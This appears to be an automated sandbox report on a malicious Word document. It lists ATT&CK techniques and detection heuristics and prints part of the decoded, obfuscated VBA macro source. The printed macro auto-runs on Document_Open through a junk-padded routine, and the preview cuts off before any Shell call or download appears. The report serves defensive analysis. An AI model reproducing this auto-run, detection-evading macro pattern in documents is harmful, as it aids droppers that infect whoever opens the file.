Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that triggers obfuscated code. Critical heuristics indicate the use of Shell() calls, strongly suggesting the execution of arbitrary commands or the download of additional payloads. The obfuscation of the VBA script prevents a detailed analysis of its exact actions, but the obfuscation itself together with the Shell() call is indicative of a downloader or dropper.
Heuristics (5)
- ClamAV: Doc.Macro.Obfuscation-6332451-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All extracted URLs in this sample were found in document text (OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 112416 bytes |

SHA-256: 6b9a9bc570a615424153b0a968bca8c4e103ea7939ef2bc8875dcdd979a95a52

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim KUI6FSl
KUI6FSl = Abs(40)
Dim STEsUCt, qzRF4vgf
STEsUCt = 1.3
qzRF4vgf = 1 / Cos(STEsUCt)
Dim ly2EX9, Qp2uQ
ly2EX9 = Array("hBt1w9Ul", "AIN8pQs")
Qp2uQ = ly2EX9(1)
Dim OEJxsoLwF, ms1ULmC
OEJxsoLwF = Array("f2RYgnO1", "xyLzTM8r", "nZyMn")
ms1ULmC = OEJxsoLwF(2)
Dim UNLdfm8, XlSG6CHI
UNLdfm8 = Array("Kxyv19d6i", "Cj2de")
XlSG6CHI = UNLdfm8(0)
Dim X2Qr6fa, XlPy5uV
X2Qr6fa = Array("vxw0DAs", "D9g1d", "IYDQSO8J")
XlPy5uV = X2Qr6fa(2)
Dim aNuWS, on7vNa
aNuWS = Array("EJRaW8x0u", "q4une")
on7vNa = aNuWS(0)
Dim y7c54ir, f0U8LEF5
y7c54ir = Array("hybDOCst")
f0U8LEF5 = y7c54ir(0)
Dim Rs74bCA
Rs74bCA = 4 * Atn(1)
tyg4SEu = 600 + 28
If tyg4SEu > -1368 + 1384 Then
r
End If
End Sub
Sub Document_Close()
Dim grzHo, ZgGWqL7UK
grzHo = Array("sU1pqbT", "dIeRnol", "ceYmr7LgW")
ZgGWqL7UK = grzHo(0)
Dim CBCczOYZ, O7NaTX5
CBCczOYZ = Array("MDKUkHy")
O7NaTX5 = CBCczOYZ(0)
Dim CJz2LuR, rAENWhMgG
CJz2LuR = Array("L4wLO")
rAENWhMgG = CJz2LuR(0)
Dim E8tV1, RDnHUYFK0
E8tV1 = Array("marI1x7s", "FfdR9v")
RDnHUYFK0 = E8tV1(0)
Dim g9H5plDn
g9H5plDn = Abs(92)
Dim UQTXVSp
UQTXVSp = 4 * Atn(1)
Dim YAgCx
YAgCx = 4 * Atn(1)
End Sub
Attribute VB_Name = "hvPuz2b"
Sub r()
Dim GTwa76P, Wnm92
GTwa76P = 1.3
Wnm92 = 1 / Cos(GTwa76P)
Dim yS6F0
yS6F0 = Abs(52)
Dim qepsU, G7gUb
qepsU = Array("R1vyC6O", "Gd2TZMybS")
G7gUb = qepsU(0)
Dim f2FiNZxl, ezO52r
f2FiNZxl = 1.3
ezO52r = 1 / Cos(f2FiNZxl)
Dim v0rLDFZG4, ywxkK
v0rLDFZG4 = 1.3
ywxkK = 1 / Cos(v0rLDFZG4)
Dim YGM7l0, U5UTiCSp
YGM7l0 = 1.3
U5UTiCSp = 1 / Cos(YGM7l0)
Dim ALfAP, qJr6HI4cD
ALfAP = Array("cWY5s", "Xo6CbB", "V2rZ1")
qJr6HI4cD = ALfAP(0)
Dim MShHW6, t8t4R
MShHW6 = Array("hQkMebfI0", "uoFIsw")
t8t4R = MShHW6(1)
Dim AMOuZ52
AMOuZ52 = Abs(56)
Dim tQEwIb, OmrE2
tQEwIb = 1.3
OmrE2 = 1 / Cos(tQEwIb)
Dim d8guMlU, Nq4bSBR
d8guMlU = Array("XJfR5X")
Nq4bSBR = d8guMlU(0)
Dim pslKrhi1k, NXHVD9B
pslKrhi1k = Array("SHhLX2Az", "ZVYG6p")
NXHVD9B = pslKrhi1k(1)
Dim uqQEP
uqQEP = Abs(73)
Dim gMtDFoie
gMtDFoie = 4 * Atn(1)
Dim hiYAxog, Sf6HP
hiYAxog = Array("X0emxXD", "ALlwQ9", "dh1kIz3W")
Sf6HP = hiYAxog(0)
Dim yj3GDv6M, tn0eNUt
yj3GDv6M = Array("rxt0Di6")
tn0eNUt = yj3GDv6M(0)
Dim DcQyOgk
DcQyOgk = Abs(55)
Dim CxuC2tDe, tqtgRwI8z
CxuC2tDe = 1.3
tqtgRwI8z = 1 / Cos(CxuC2tDe)
Dim MjQ4ek5O
MjQ4ek5O = 4 * Atn(1)
Dim jxpJ6CG, J3dKhP6
jxpJ6CG = Array("nxQZcXOoL")
J3dKhP6 = jxpJ6CG(0)
Dim x2jzLY, jJtHxfNgB
x2jzLY = Array("jf2Rs0gJl", "oCGjV2")
jJtHxfNgB = x2jzLY(0)
Dim NSFp8, fCEfVdy
NSFp8 = Array("stoxHjpk7")
fCEfVdy = NSFp8(0)
Dim b0YscGkUt
b0YscGkUt = 4 * Atn(1)
Dim oITcCQbV7, jeTn1
oITcCQbV7 = Array("E6eYL5kl", "GJOLxMc", "STfpZLbr")
jeTn1 = oITcCQbV7(0)
Dim GLsBbKloI
GLsBbKloI = 4 * Atn(1)
Dim jkfDwy, o8dVE0
jkfDwy = Array("xjYgVP", "knOHk7RX", "TOVDhcUX")
o8dVE0 = jkfDwy(0)
Dim R7bUzK
R7bUzK = 4 * Atn(1)
Dim R4qR2NxZ, ThDKAa
R4qR2NxZ = Array("d9Js1G", "dCQPzW", "FdO3ys8ie")
ThDKAa = R4qR2NxZ(0)
Dim fvblZeiX, lTFjxbv
fvblZeiX = Array("fvweBdAmT", "eDcG3r")
lTFjxbv = fvblZeiX(1)
Dim aOUgI, AzZgw0fT4
aOUgI = Array("XoqO43m", "o893BTu", "ZxJaLtO")
AzZgw0fT4 = aOUgI(0)
Dim oYIev, alXqmQ9
oYIev = Array("XBw7qmtA3")
alXqmQ9 = oYIev(0)
Dim qST6xw4
qST6xw4 = 4 * Atn(1)
Dim ogD8GQ7, wLCsEj1a
ogD8GQ7 = Array("scbzV9XhA")
wLCsEj1a = ogD8GQ7(0)
Dim SvRwkBJS9, pgBvoM
SvRwkBJS9 = 1.3
pgBvoM = 1 / Cos(SvRwkBJS9)
Dim F8aNA45E
F8aNA45E = Abs(52)
Dim z3Sk0dxpL, AslcIZ
z3Sk0dxpL = Array("rBI4GtHJ0")
AslcIZ = z3Sk0dxpL(0)
Dim WkdYwD2, toBVsCe
WkdYwD2 = 1.3
toBVsCe = 1 / Cos(WkdYwD2)
Dim jmkQfDI9, St801C3ke
jmkQfDI9 = Array("wtD5PLf", "oem7jz9")
St801C3ke = jmkQfDI9(1)
Dim SzisCWvI, g1nWc
SzisCWvI = Array("do1LCOJN", "PUsxPBX7", "hry4J")
g1nWc = SzisCWvI(2)
Dim aNqwp2UGH, vySrYp
aNqw
... (truncated)